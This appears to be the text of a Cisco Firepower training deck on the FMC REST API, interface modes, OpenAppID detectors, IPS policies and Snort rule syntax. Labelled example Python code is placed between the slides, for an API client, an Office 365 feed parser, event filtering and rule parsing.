• REST VDI has a special role
API Explorer
Free tool built into the FMC that can be used to access the REST API

• https://<FMC_IP_or_name>:<https_port>/api/api-explorer
• Provides sample code in Perl and Python

API Explorer from 6.4 (the Legacy Explorer remains available): the specification is shown in JSON, parameters are preloaded, a test request can be executed from the page, and the detailed response is displayed
Token based Authentication

• Set the API client to make a POST command to this URL: https://<FMC_IP_or_name>/api/fmc_platform/v1/auth/generatetoken
• Include the username and password as a basic authentication header; the POST body should be blank
• Add the header X-auth-access-token:<authentication token value> in requests to the API
• Tokens are valid for 30 minutes, and can be refreshed up to three times
• On error it gives code 401 (Unauthorized User)

Exchange between the REST client and the REST API:
1. HTTP request to get an access token (username, password) → the API authenticates the user → HTTP 200 OK with access and refresh tokens
2. Request for access to the resource (access token) → the API validates the access token and gives access to the resource → appropriate HTTP response
3. In case the access token expires: HTTP POST to generate a new access token → the API validates the access and refresh tokens and generates new access and refresh tokens → HTTP 200 OK, returning the new access and refresh tokens
Token and Domain UUID

• When you retrieve the token, the UUIDs (Universally Unique Identifiers) of the domains for which the user is authorized are sent in the HTTP header along with the tokens
• Using your API credentials (username and password), the return headers will include domain details

Postman plugin:
Request and Response Format

• Request format: https://{host}:{port}/{object_url}/{object_uuid}?{options}
  • For example, for bulk, if it is supported: bulk=true
• Response: hierarchical structure with IDs; each object has its own unique ID and its own unique URL, and the domain UUID is part of the URL

Access Control Policy response:

    "items": [
      {
        "type": "AccessPolicy",
        "links": {
          "self": "https://10.62.42.172/api/fmc_config/v1/domain/e276abec-e0f2-11e3-8169-6d9ed49b625f/policy/accesspolicies/005056AE-729E-0ed3-0000-008589934871"
        },
        "name": "ACCESS_POLICY_1",
        "id": "005056AE-729E-0ed3-0000-008589934871"
      },
      {
        "type": "AccessPolicy",
        "links": {
          "self": "https://10.62.42.172/api/fmc_config/v1/domain/e276abec-e0f2-11e3-8169-6d9ed49b625f/policy/accesspolicies/005056AE-729E-0ed3-0000-017179869386"
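The token exchange, the domain UUID returned in the headers and the bulk request format described on the preceding slides fit together in one small client. The code below is an added example, not Cisco's code and not one of the scripts in the "Codes" folder. It uses the generatetoken URL from the slide, the X-auth-access-token and DOMAIN_UUID headers the slides describe, the FMC refreshtoken endpoint and the object/networks?bulk=true URL (both of which are part of the FMC REST API but not shown on the slides), and it refreshes at most three times before logging in again. The transport parameter and the FakeFmc class are constructions of this example so that the client can be exercised offline; the domain UUID in FakeFmc is the one from the slide's sample response.

```python
"""FMC REST API client skeleton: token login, domain UUID, bulk POST.

Added example, not Cisco's code. Models the slides' token exchange (Basic
auth POST to generatetoken, X-auth-access-token on every call, at most three
refreshes, then a new login) and sends bulk object creation in chunks of 1000
with ?bulk=true. 'transport' and FakeFmc are constructions for offline use.
"""
import base64
import json
import ssl
import urllib.request
from urllib.error import HTTPError

LOGIN_PATH = "/api/fmc_platform/v1/auth/generatetoken"
REFRESH_PATH = "/api/fmc_platform/v1/auth/refreshtoken"
MAX_REFRESH = 3      # a token pair may be refreshed three times (slide)
BULK_CHUNK = 1000    # objects per bulk POST (slide)


def urllib_transport(method, url, headers, body):
    """Real HTTPS transport returning (status, headers, body_text)."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    ctx = ssl.create_default_context()  # verify the FMC certificate; never disable this
    try:
        with urllib.request.urlopen(req, context=ctx) as resp:
            return resp.status, dict(resp.headers), resp.read().decode()
    except HTTPError as err:
        return err.code, dict(err.headers), err.read().decode()


class FmcClient:
    def __init__(self, host, username, password, transport=urllib_transport):
        self.base = f"https://{host}"
        self._basic = base64.b64encode(f"{username}:{password}".encode()).decode()
        self._send = transport
        self.access_token = self.refresh_token = self.domain_uuid = None
        self.domains, self.refreshes = [], 0

    def login(self):
        """POST generatetoken with a Basic auth header and a blank body."""
        status, hdrs, _ = self._send("POST", self.base + LOGIN_PATH,
                                     {"Authorization": "Basic " + self._basic}, None)
        if status != 200:
            raise PermissionError(f"login failed: HTTP {status}")
        self._store_tokens(hdrs)
        self.refreshes = 0
        return self.domain_uuid

    def refresh(self):
        """Refresh the token pair; after three refreshes (or with no token) log in again."""
        if self.refreshes >= MAX_REFRESH or not self.access_token:
            return self.login()
        status, hdrs, _ = self._send("POST", self.base + REFRESH_PATH,
                                     {"X-auth-access-token": self.access_token,
                                      "X-auth-refresh-token": self.refresh_token}, None)
        if status >= 300:          # refresh rejected: fall back to a fresh login
            return self.login()
        self._store_tokens(hdrs)
        self.refreshes += 1
        return self.domain_uuid

    def _store_tokens(self, hdrs):
        h = {k.lower(): v for k, v in hdrs.items()}   # header names are case-insensitive
        self.access_token = h["x-auth-access-token"]
        self.refresh_token = h.get("x-auth-refresh-token", self.refresh_token)
        self.domain_uuid = h.get("domain_uuid", self.domain_uuid)
        if "domains" in h:                           # JSON list of authorised domains
            self.domains = json.loads(h["domains"])

    def request(self, method, path, payload=None, retry=True):
        """Authenticated call; a 401 triggers one refresh (or re-login) and a retry."""
        body = json.dumps(payload).encode() if payload is not None else None
        headers = {"X-auth-access-token": self.access_token or "",
                   "Content-Type": "application/json"}
        status, _, text = self._send(method, self.base + path, headers, body)
        if status == 401 and retry:
            self.refresh()
            return self.request(method, path, payload, retry=False)
        if status >= 300:
            raise RuntimeError(f"{method} {path} -> HTTP {status}: {text[:200]}")
        return json.loads(text) if text else {}

    def bulk_create_networks(self, objects):
        """Create network objects with ?bulk=true, at most 1000 per request."""
        path = f"/api/fmc_config/v1/domain/{self.domain_uuid}/object/networks?bulk=true"
        created = []
        for i in range(0, len(objects), BULK_CHUNK):
            created.extend(self.request("POST", path, objects[i:i + BULK_CHUNK]).get("items", []))
        return created


class FakeFmc:
    """Constructed stand-in for an FMC so the client can be exercised offline."""
    DOMAIN = "e276abec-e0f2-11e3-8169-6d9ed49b625f"   # Global domain UUID from the slide

    def __init__(self):
        self.logins, self.posts = 0, []

    def __call__(self, method, url, headers, body):
        if url.endswith(LOGIN_PATH):
            self.logins += 1
            return 200, {"X-auth-access-token": f"tok{self.logins}",
                         "X-auth-refresh-token": f"ref{self.logins}", "DOMAIN_UUID": self.DOMAIN,
                         "DOMAINS": json.dumps([{"name": "Global", "uuid": self.DOMAIN}])}, ""
        if not headers.get("X-auth-access-token"):
            return 401, {}, '{"error": {"messages": [{"description": "User authentication failed"}]}}'
        if url.endswith(REFRESH_PATH):
            return 204, {"X-auth-access-token": headers["X-auth-access-token"] + "r",
                         "X-auth-refresh-token": headers["X-auth-refresh-token"] + "r"}, ""
        items = json.loads(body)
        self.posts.append(len(items))
        return 201, {}, json.dumps({"items": [dict(o, id=f"id-{len(items)}-{n}") for n, o in enumerate(items)]})
```

Against a real FMC, construct the client with the default transport and a dedicated API user (not admin, as the best-practices slide says), call login() once, and let request() handle the 401 that an expired token produces; the chunking in bulk_create_networks is why the "100's of interfaces" demo is practical at all.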
API Examples
Python scripts are available in the “Codes” folder!

Demo: Why Do We Need Bulk Method?
Demo: Add 100’s of interfaces to FTD
Demo: Managing Office365 Exclusions
Managing Office365 Exclusions

• Microsoft Office site for exclusions (IPs, URLs) -> Parser script -> FMC Objects
• Database access: https://endpoints.office.com/endpoints/Germany?ClientRequestId=d8...
• Version checking, and the script can be scheduled
• Selectable regions: Worldwide, Germany (Europe), USGovDoD, China
• Selectable services: Exchange, SharePoint, Skype
• More information:
  • https://www.youtube.com/watch?v=nY9nWVrgO4I
  • https://github.com/chrivand/Firepower_O365_Feed_Parser

Sample record returned by the endpoint:

    [
      {
        "id": 1,
        "serviceArea": "Exchange",
        "serviceAreaDisplayName": "Exchange Online",
        "urls": [ "outlook.office.de" ],
        "ips": [
          "51.4.64.0/23",
          "51.5.64.0/23"
        ],
        "tcpPorts": "80,443",
        "expressRoute": false,
        "category": "Optimize",
        "required": true
      },
      ...
    ]

More information: Protecting your Office 365 environment: leverage the Firepower API, Cisco Cloud Email Security and more - BRKSEC-3433
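The parser step of the slide (feed record in, FMC objects out, with a version check so the job can be scheduled) is shown below as an added example. It is neither Cisco's code nor the chrivand parser linked above. SAMPLE_FEED and SAMPLE_VERSION are constructed with the shape of the Germany/Exchange record on the slide and of the feed's version endpoint; nothing is fetched. The O365_ naming scheme and the Host, Network and Url payload shapes used for the FMC objects are assumptions of this example.

```python
"""Parse the Office 365 endpoint feed into FMC object payloads.

Added example; neither Cisco's code nor the chrivand parser linked on the
slide. SAMPLE_FEED and SAMPLE_VERSION are constructed with the shape of the
Germany/Exchange record shown on the slide; nothing is fetched. The 'O365_'
naming scheme and the FMC payload shapes (Host, Network, Url) used here are
assumptions of this example.
"""
import ipaddress
import json

# Constructed sample of /endpoints/<region>?ClientRequestId=... output.
SAMPLE_FEED = json.dumps([
    {"id": 1, "serviceArea": "Exchange", "serviceAreaDisplayName": "Exchange Online",
     "urls": ["outlook.office.de"], "ips": ["51.4.64.0/23", "51.5.64.0/23"],
     "tcpPorts": "80,443", "expressRoute": False, "category": "Optimize", "required": True},
    {"id": 2, "serviceArea": "SharePoint", "serviceAreaDisplayName": "SharePoint Online",
     "urls": ["*.sharepoint.de"], "ips": ["51.5.66.10/32"],
     "tcpPorts": "443", "expressRoute": False, "category": "Default", "required": True},
    {"id": 3, "serviceArea": "Skype", "serviceAreaDisplayName": "Skype for Business Online",
     "urls": ["*.lync.com"], "udpPorts": "3478,3479",
     "expressRoute": False, "category": "Allow", "required": False},
])
# Constructed sample of the feed's version endpoint, used for change detection.
SAMPLE_VERSION = json.dumps({"instance": "Germany", "latest": "2020010100"})


def needs_update(stored_version, version_text):
    """Compare the last processed feed version with the published one."""
    latest = json.loads(version_text)["latest"]
    return latest != stored_version, latest


def parse_feed(text, service_areas=None, required_only=True):
    """Return the feed records for the selected services (e.g. {'Exchange'})."""
    keep = []
    for rec in json.loads(text):
        if service_areas and rec.get("serviceArea") not in service_areas:
            continue
        if required_only and not rec.get("required", False):
            continue
        keep.append(rec)
    return keep


def _object_name(prefix, rec, value):
    # Assumed naming scheme: prefix + service area + value with '.' and '/'
    # replaced, so the name only contains characters FMC accepts.
    return f"{prefix}{rec['serviceArea']}_{value.replace('.', '-').replace('/', '_')}"


def fmc_network_objects(records, prefix="O365_"):
    """Build Host/Network object payloads from each record's 'ips' list."""
    objects = []
    for rec in records:
        for cidr in rec.get("ips", []):
            net = ipaddress.ip_network(cidr, strict=False)   # rejects malformed feed values
            single = net.num_addresses == 1
            objects.append({
                "name": _object_name(prefix, rec, str(net)),
                "type": "Host" if single else "Network",
                "value": str(net.network_address) if single else str(net),
                "description": f"{rec['serviceAreaDisplayName']} ({rec['category']})",
            })
    return objects


def fmc_url_objects(records, prefix="O365_"):
    """Build Url object payloads from each record's 'urls' list (wildcards kept)."""
    return [{"name": _object_name(prefix, rec, url.lstrip("*.")),
             "type": "Url", "url": url,
             "description": f"{rec['serviceAreaDisplayName']} ({rec['category']})"}
            for rec in records for url in rec.get("urls", [])]


if __name__ == "__main__":
    changed, latest = needs_update("2019120200", SAMPLE_VERSION)
    if changed:   # only rebuild the objects when Microsoft published a new feed version
        recs = parse_feed(SAMPLE_FEED, {"Exchange", "SharePoint"})
        for obj in fmc_network_objects(recs) + fmc_url_objects(recs):
            print(json.dumps(obj))
```

Filtering on the required flag keeps optional endpoints out of the exclusion list, and validating each prefix with ipaddress before it becomes an FMC object means a malformed feed entry fails the scheduled run instead of being pushed into the policy.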
DEVNET, 12 FMC REST API Labs (For Your Reference)

• https://learninglabs.cisco.com/labs/tags/Coding,Python/page/1

DEVNET, Security Express (For Your Reference)

• https://learninglabs.cisco.com/tracks/devnet-express-security
• https://dcloud2-lon.cisco.com/content/demo/304193

Additional REST API Examples (For Your Reference)

• http://cs.co/ats-apis
Deployment and Interface Modes
FTD Deployment and Interface Modes

• 2 Deployment Modes (Device Modes inherited from ASA):
  • Routed
  • Transparent
• 6 Interface Modes
  • Regular Firewall Modes - Interface Modes inherited from ASA:
    • Routed
    • Bridged
  • IPS-only Modes - Interface Modes inherited from Firepower:
    • Passive
    • Passive (ERSPAN)
    • Inline Pair
    • Inline Pair with Tap
• Interface modes can be mixed on a single FTD device
FTD Deployment Modes

• The FTD appliance can be deployed in either Routed or Transparent Firewall mode
• This is a global setting
• Changing between these modes requires re-registering with FMC

Diagram: a Routed/Transparent FTD with interfaces A–D on one side and E–H on the other, with Policies applied between them
Routed Firewall Mode

• Routed Mode is the traditional mode of the Firewall
• Routed Mode Firewall interfaces - two or more interfaces in separate L3 domains
• Firewall is the Router and Gateway for local hosts

Diagram: interfaces A–D in 10.1.1.0/24 and E–H in 10.1.2.0/24, separated by the routed FTD and its Policies
Transparent Firewall Mode

• In Transparent Mode FTD acts as a Bridge functioning at L2
• Allows easy introduction of a Firewall into an existing network
• Must configure IP on BVI in Transparent Mode
• VLAN or VxLAN ID must change during traversal
• DHCP, Multicast and Dynamic Routing protocol traffic is blocked by default

Diagram: transparent FTD bridging VLAN 10 (interfaces A–D) to VLAN 20 (interfaces E–H) through BVI 1 and BVI 2, with Policies in between
Integrated Routing and Bridging (IRB)

• Allows configuration of Bridges in Routed Firewall Mode
• Regular routed interfaces can co-exist with BVI interfaces and interfaces that are members of Bridge groups
• Available from FTD 6.2 release, on all platforms except for the virtual FTD and Firepower 2100 series

Diagram: routed FTD with routed interfaces A and E (10.1.3.0/24 and 10.1.4.0/24) alongside BVI DMZ1 (10.1.1.0/24) and BVI DMZ2 (10.1.2.0/24)
Firepower 1010 Ports and Interfaces
FTD 6.5 and ASA 9.13(1) release

• Physical interfaces can be configured as routed firewall interfaces or as switch port interfaces
• Physical firewall interface — forwards traffic using the configured security policy to apply firewall and VPN services
• Physical switch port — forwards traffic at Layer 2, using the switching function in hardware
• Switch ports on the same VLAN can communicate with each other using hardware switching, and traffic is not subject to the FTD security policy

Diagram: Eth 1/1 as the routed firewall interface towards the Internet, Eth 1/5 as a routed interface towards 10.1.4.0/24, Eth 1/2 – 1/4 as switch ports in VLAN 10 (BVI DMZ1) and Eth 1/6 – 1/8 as switch ports in VLAN 20 (BVI DMZ2)

Firepower 1010 Ports and Interfaces

• Access ports accept only untagged traffic; assign them to a single VLAN
• Trunk ports accept untagged and tagged traffic and can belong to more than one VLAN
• By default, Ethernet 1/2 through 1/8 are configured as access switch ports on VLAN 1, and the Ethernet 1/1 interface is configured as a firewall interface
• Unfiltered port-to-port forwarding with Switched Virtual Interface (SVI)
• No dynamic routing, EtherChannel, or HA/failover monitored interfaces
NGFW Packet Flow

Diagram of the NGFW datapath (RX to TX):
• Datapath, ingress: L2 Decode → Load-Balance to Flow Lookup → for a new flow: Cluster Flow Redirect, Flow Creation, VPN Decrypt, TCP Intercept, NAT Lookup, Advanced IP ACL Match, Route and Flow Lookup; for an existing flow: NAT Translate, TCP Normalizer, L4 Decode
• Snort Inspection Engines: IP Decode, Reassembly, Reputation and SI, Network Discovery, Application Inspection, File/AMP Processing, NGIPS, Network Analysis Policy, Main Access Policy, TCP Proxy; the verdict is written back into the Flow Database (Update Flow with Verdict)
• Datapath, egress: QoS, Policy-Based Routing, VPN Encrypt, L3/L2, L2-L3 Decode
IPS-only Interface Modes

• Can be used in both Firewall Modes
• Traffic is processed by a subset of the Datapath functions and by all Advanced Inspection Engine processes
• A packet can be impacted by either the Datapath or the Advanced Inspection Engines in Inline Mode, after policy and security checks
• A packet is not impacted in Inline Tap or Passive Modes
• Datapath still tracks the flow
IPS-only Interface modes - Passive Mode

• A Promiscuous Interface receives copies of traffic from a SPAN port or Tap
• Available in Transparent or Routed deployment mode
• Passive ERSPAN mode requires Routed FTD mode (GRE to encapsulate the traffic)

Diagram: a Passive interface attached to a Routed/Transparent FTD next to its regular interfaces A–H and Policies
IPS-only Interface modes - Inline Pair Mode

• Physical interfaces
• EtherChannel (Firepower 4100/9300)
• True pass-through mode for VLANs
• Data Plane tracks connections for HA/Clustering
• Supported in intra-chassis and inter-chassis clustering
• Link state propagation
• Snort Fail-Open or Fail-Close

Diagram: Inline Pair 1 passing VLAN 10 through a Routed/Transparent FTD unchanged (VLAN 10 on both sides)
IPS-only Interface modes - Inline Set

• A grouping of two or more Inline Pairs
• Inline sets allow asymmetry

Diagram: Inline Pair 1 and Inline Pair 2 grouped into one Inline Set on a Routed/Transparent FTD, VLAN 10 on both sides
IPS-only Interface modes - Inline Tap

• Available in Transparent or Routed Mode
• Traffic passes from one member interface to another, without changing VLAN
• As traffic passes, it is copied to the inspection engine, so traffic cannot be blocked

Diagram: Inline TAP on a Routed/Transparent FTD, VLAN 10 on both sides
NGIPS Packet Flow

Diagram of the NGIPS datapath (RX to TX): the same stages as the NGFW packet flow, with these differences: a new flow goes through Lightweight Flow Creation, an existing flow through Lightweight State Tracking, and the Datapath only acts upon the verdict returned by the Snort Inspection Engines (IP Decode, Reassembly, Reputation and SI, Network Discovery, Application Inspection, File/AMP Processing, NGIPS, Network Analysis Policy, Main Access Policy, TCP Proxy). The Datapath stages shown are L2 Decode, Load-Balance to Flow Lookup, Cluster Flow Redirect, VPN Decrypt, TCP Intercept, NAT Lookup, Advanced IP ACL Match, NAT Translate, L4 Decode, QoS, Policy-Based Routing, VPN Encrypt, L3/L2 and L2-L3 Decode.
Application Visibility and Control (AVC)
Application Visibility and Control

• Support for 4000+ applications and detectors
• Applications are grouped according to:
  • Risk
  • Business relevance
  • Types, categories and tags
  • User-Created Filters
• Cisco Firepower Application Detector Reference
• All Application Detectors in Firepower use OpenAppID
OpenAppID Overview

• OpenAppID leverages the Lua scripting language
  • Application detectors are written using Lua (not Sn
ort rules)
  • Lua is an open-source scripting language
  • Designed, implemented and maintained at the Pontifical Catholic University of Rio de Janeiro in Brazil
• Benefits of Lua
  • Proven – used in many industrial applications, including several Cisco products
  • Powerful and fast – utilizes the LuaJIT just-in-time compiler
  • Portable and embeddable – well documented API
  • Simple, lightweight and small
  • See more at http://www.lua.org
Access Control Policy
Adding Application Control Rules

Types of Custom Detectors

• Basic
• FMC creates Lua script after administrator describes application in a Wizard
• Limited to specific combinations of port matching, string matching, and protocol
• Advanced
• Administrator creates and uploads custom Lua script
• Unleashes the power of Lua

Example of a Lua Script (For Your Reference)

    --[[
    detection_name: SampleAppDetector
    version: 1
    description:
    Detects "cisco123" on port 8888
    --]]

    require "DetectorCommon"
    local DC = DetectorCommon
    local proto = DC.ipproto.tcp;

    -- Package descriptor: tells the engine which callbacks implement the detector
    DetectorPackageInfo = {
        name = "SampleAppDetector",
        proto = proto,
        server = {
            init = 'DetectorInit',
            validate = 'DetectorValidator',
            clean = 'DetectorClean',
            minimum_matches = 1
        }
    }

    -- Called once when the detector is loaded: registers the application
    -- and a port/pattern match (TCP 8888, payload "cisco123")
    function DetectorInit(detectorInstance)
        gDetector = detectorInstance;
        gAppId = gDetector:open_createApp("SampleApp");
        if gDetector.addPortPatternService then
            gDetector:addPortPatternService(proto, 8888, "cisco123", -1, gAppId);
        end
    end

    -- Called per packet when further validation is needed; nothing to do here
    function DetectorValidator()
    end

    -- Called when the detector is unloaded
    function DetectorClean()
    end
OpenAppID within Firepower
Creating the Basic Custom Detector

• Define and Add Application Protocol
• Specify name, Description, Business Relevance and Risk fields (For Your Reference)
• Specify Category
• Now specify name, Description and Application Protocol fields and click OK

Creating the Detection Patterns (For Your Reference)

• Adding Detection Patterns
• Different protocols available
• Basic Detectors perform an OR operation on the Detection Patterns
• Optional test with pcap files

Creating the Custom Detector

• You can find your Application Detector by selecting Custom Type in the Filters
• The new Application Detector will not function until it is Activated by clicking on the State slider

Adding Rule in the Access Control Policy

Access Control Policy
Preprocessors

• Preprocessors play a vital function in network traffic inspection
  • Present packets to the detection engine in a contextually relevant way
  • Normalize traffic
  • Alert if they detect anomalous conditions as defined by their settings
• Major preprocessors include the following
  • frag3 – Used to reassemble packet fragments prior to inspection
  • stream5 – Used to reconstruct TCP data streams so that inspection can be done in the context of a TCP conversation
  • Protocol decoders – Normalize TCP streams: telnet, FTP, SMTP and RPC
  • http_inspect – Normalizes HTTP traffic
  • sfPortscan – Used to detect portscans
• The Network Analysis Policy (NAP) controls the Preprocessors
Network Analysis Policy

System Provided Network Analysis Policy

• Connectivity over Security
  • 15 preprocessors enabled
• Balanced Security and Connectivity
  • 15 preprocessors enabled
• Security over Connectivity
  • 17 preprocessors enabled
• Maximum Detection
  • 18 preprocessors enabled

Network Analysis Policy (cont.)
Next Generation Intrusion Prevention System (IPS)
Next Generation IPS Policy Overview

• An IPS Policy determines:
  • Which IPS rules are “on” (Generate or Drop and Generate) and which are “off” (Disabled)
  • Many aspects of how the IPS will inspect traffic
• Multiple IPS policies can be deployed on a Firewall
  • IPS policies can be optimized for different traffic flows through the device
  • The Access Control Policy controls which flow will be inspected by which IPS policy (with Allow and Interactive Block rule actions)
System Provided Base IPS Policies

• Connectivity over Security: ~ 500 Rules
  • CVSS Score of 10
  • Age of Vulnerability: Current year and 2 prior years
• Balanced Security and Connectivity: ~11.000 Rules
  • CVSS Score of 9 or greater
  • Age of Vulnerability: Current year and 2 prior years
  • Rule category equals Malware-CnC, blacklist, SQL Injection, Exploit-kit
• Security over Connectivity: ~ 17.000 Rules
  • CVSS Score of 8 or greater
  • Age of Vulnerability: Current year and 3 prior years
  • Rule category equals Malware-CnC, blacklist, SQL Injection, Exploit-kit, App-detect
• Maximum Detection: ~ 31.000 Rules
  • CVSS Score of 7.5 or greater
  • Age of Vulnerability: 2005 and later
  • Rule category equals Malware-CnC, Exploit-kit
  • Not for use in deployment – used only for benchmark testing
• No Rules Active
  • Often used if planning to use Firepower Recommendations to turn rules on based on your environment
  • Problem - you no longer have the advantage of Talos’ input for the new rules
  • The best practice is to start with Security Over Connectivity (or Balanced) and use the recommendations to adjust these in a layer
Snort Rule Updates

• Cisco Talos provides regular rule updates, and these are typically installed automatically
• The rules provided in a Snort Rule Update (SRU) package are created and tested by the Cisco Talos Security Intelligence and Research Group

Screenshot: uncheck the option to prevent/control automatic rule installation
Intrusion Policy Rules (For Your Reference)

• How to search for rules included in SRU updates?
• Different rule categories
• Several ways to search for rules
• Several ways to search for rules: Platform specific
• Several ways to search for rules: Microsoft vulnerabilities
Importing Snort Rules

• The import file can contain many rules as long as there is one rule per line
• Navigate to Objects > Intrusion Rules
• Click on “Import Rules”
• Click on “Browse” to locate your file, and click “Import”
• If successful, you will see a screen showing what has been imported (the imported rules are listed with SID >1.000.000)
• If unsuccessful, the Rule Update Log will tell you what was wrong with the file

Enabling Snort Rules

• All imported rules are disabled by default, you need to enable them
Snort Language
Overview

• A simple lightweight language for identifying
  • Security policy violations
  • Known network attacks and IDS/IPS evasion techniques
• The basic unit of the Snort language is the Snort rule
• The Snort language supports event filters
  • Limit – Alert on a specified number of events during a specified time interval, then ignore events for the rest of the specified time interval
  • Threshold – Only alert if the event is seen a specified number of times within a specified time interval
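The two event filter types are easiest to understand by running them over a burst of events. The code below is an added example, not Snort's or Cisco's implementation: a small model of limit and threshold tracking per source address inside a time window, plus Snort's third type, both, which goes beyond the two the slide lists. The events and SIDs are constructed.

```python
"""Snort-style event filters: 'limit' and 'threshold' (plus 'both').

Added example, not Snort's or Cisco's implementation: a small model of the
event_filter types named on the slide, tracked per source address inside a
time window. The 'both' type is Snort's third option and goes beyond the two
the slide lists. Events below are constructed.
"""


class EventFilter:
    """limit: alert on the first `count` events per interval, then suppress.
    threshold: alert on every `count`-th event inside the interval.
    both: alert once per interval, on the `count`-th event."""

    def __init__(self, sid, ftype, count, seconds, track="by_src"):
        if ftype not in ("limit", "threshold", "both"):
            raise ValueError(f"unknown filter type {ftype}")
        self.sid, self.ftype, self.count, self.seconds, self.track = sid, ftype, count, seconds, track
        self._windows = {}   # tracked address -> (window_start, events_seen)

    def allow(self, event):
        """Return True if this event should raise an alert."""
        if event["sid"] != self.sid:
            return True                      # a filter applies to one SID only
        key = event["src"] if self.track == "by_src" else event["dst"]
        start, seen = self._windows.get(key, (None, 0))
        if start is None or event["ts"] - start >= self.seconds:
            start, seen = event["ts"], 0      # interval expired: open a new one
        seen += 1
        self._windows[key] = (start, seen)
        if self.ftype == "limit":
            return seen <= self.count
        if self.ftype == "threshold":
            return seen % self.count == 0
        return seen == self.count            # both


def apply_filter(flt, events):
    """Timestamps of the events that pass the filter (events must be in time order)."""
    return [e["ts"] for e in events if flt.allow(e)]


# Constructed burst: five hits of a local rule from one host within five seconds,
# one unrelated event, then one more hit of the local rule a minute later.
SAMPLE_EVENTS = [{"sid": 1000001, "src": "10.1.1.5", "dst": "10.1.2.9", "ts": t}
                 for t in (0, 1, 2, 3, 4)]
SAMPLE_EVENTS += [{"sid": 16703, "src": "10.1.1.5", "dst": "10.1.2.9", "ts": 5},
                  {"sid": 1000001, "src": "10.1.1.5", "dst": "10.1.2.9", "ts": 70}]

if __name__ == "__main__":
    for ftype, count in (("limit", 2), ("threshold", 2), ("both", 3)):
        print(ftype, apply_filter(EventFilter(1000001, ftype, count, 60), SAMPLE_EVENTS))
```

Limit is the right choice when one alert per source is enough to investigate a noisy signature; threshold is the right choice when a single hit is expected background and only repetition is interesting.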
Snort Language
Sample rule

    alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 (msg:"SERVER-MYSQL Database COM_FIELD_LIST Buffer Overflow attempt"; flow:to_server,established; content:"|04|"; depth:1; offset:4; metadata:policy security-ips drop, service mysql; reference:cve,2010-1850; classtype:attempted-user; sid:16703; rev:10; )

• Rule header: alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 ($EXTERNAL_NET and $SQL_SERVERS are variables)
• Rule body (everything in parentheses):
  • msg – Alert text
  • flow – Flow attribute
  • content, depth, offset – Content search
  • metadata, reference, classtype – Metadata
  • sid, rev – Signature ID and revision number
Variable Sets

• Variables are a critical component of IPS rules
• Used to identify source and destination IP addresses and ports
• Variable sets manage, customize, and group your variables
• A default variable set is provided; custom variables and variable sets can be created
Multiple Definitions for a Variable Set

• The best practice is to be as specific as possible
• Defining $EXTERNAL_NET as !$HOME_NET
  • Significant performance gain
  • Never use it in internally-based policies (traffic between two internal hosts can never
    match an $EXTERNAL_NET source)
• Each network can be identified with unique variable values
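
An added Python example (not Cisco or Snort code) that parses the sample rule from the previous slide into header and options and evaluates the header against a constructed variable set in which $EXTERNAL_NET is !$HOME_NET, which shows why an internal source can never match such a rule; the addresses and variable values are assumptions.

```python
"""Snort rule header/body parser with variable-set resolution.

Added example, not code from the Cisco deck. It parses the SERVER-MYSQL rule
shown on the slide and evaluates its header against constructed 4-tuples using
a constructed variable set ($HOME_NET, $EXTERNAL_NET = !$HOME_NET, $SQL_SERVERS).
"""
import ipaddress

SAMPLE_RULE = (
    'alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306 '
    '(msg:"SERVER-MYSQL Database COM_FIELD_LIST Buffer Overflow attempt"; '
    'flow:to_server,established; content:"|04|"; depth:1; offset:4; '
    'metadata:policy security-ips drop, service mysql; reference:cve,2010-1850; '
    'classtype:attempted-user; sid:16703; rev:10;)'
)

# constructed variable set: only $HOME_NET is defined concretely
VARIABLE_SET = {
    "HOME_NET": "[10.0.0.0/8,192.168.0.0/16]",
    "EXTERNAL_NET": "!$HOME_NET",
    "SQL_SERVERS": "$HOME_NET",
}


def parse_rule(text):
    """Split a rule into its header fields and an ordered list of (keyword, value) options."""
    header, _, body = text.partition("(")
    body = body.rstrip().rstrip(")")
    action, proto, src, sport, direction, dst, dport = header.split()
    options = []
    for opt in _split_options(body):
        keyword, _, value = opt.partition(":")
        options.append((keyword.strip(), value.strip().strip('"')))
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "direction": direction, "dst": dst, "dport": dport, "options": options}


def _split_options(body):
    """Split on ';' but not inside double quotes (msg text may contain ';')."""
    out, cur, quoted = [], [], False
    for ch in body:
        if ch == '"':
            quoted = not quoted
        if ch == ";" and not quoted:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        out.append(tail)
    return [o for o in out if o]


def addr_matches(spec, ip, variables=VARIABLE_SET):
    """Evaluate a Snort address spec (any, CIDR, [flat list], !negation, $VAR) for one IP.

    Nested lists such as [a,[b,c]] are not handled; the sample variable set only uses flat lists.
    """
    spec = spec.strip()
    if spec == "any":
        return True
    if spec.startswith("!"):
        return not addr_matches(spec[1:], ip, variables)
    if spec.startswith("$"):
        return addr_matches(variables[spec[1:]], ip, variables)
    if spec.startswith("["):
        return any(addr_matches(p, ip, variables) for p in spec[1:-1].split(","))
    return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def port_matches(spec, port):
    """Evaluate a port spec: any, a single port, or a lo:hi range with open ends."""
    if spec == "any":
        return True
    if ":" in spec:
        lo, _, hi = spec.partition(":")
        return (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    return int(spec) == port


def header_matches(rule, src_ip, src_port, dst_ip, dst_port, variables=VARIABLE_SET):
    """True when a unidirectional (->) rule header matches the given 4-tuple."""
    return (addr_matches(rule["src"], src_ip, variables)
            and port_matches(rule["sport"], src_port)
            and addr_matches(rule["dst"], dst_ip, variables)
            and port_matches(rule["dport"], dst_port))


def option(rule, keyword):
    """First value for an option keyword, e.g. option(rule, "sid") -> "16703"."""
    return next((v for k, v in rule["options"] if k == keyword), None)
```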
Variable Sets and Intrusion Policies

• Associated with intrusion policies in Access Control Policy rules or with the default
  action of an access control policy
• To protect different networks, use a custom IPS policy for each network

(Screenshot callout: choose the variable set here)
Network Discovery Policy

• The Network Discovery Policy is used to identify for which networks Firepower
should perform passive discovery and build Host Profiles

Host Profile

• XML file associated with a particular IP address
• Complete view of all the information available for hosts (OS, services, applications,
  potential vulnerabilities and different host attributes)
• The Firepower system can also build a Host Profile manually or through the host input API
Network Discovery Policy
Advanced Settings

(Two screenshot slides of the Network Discovery Policy advanced settings.)
Firepower Recommended Rules

• Firepower Recommendations make sure your system has the right detections enabled,
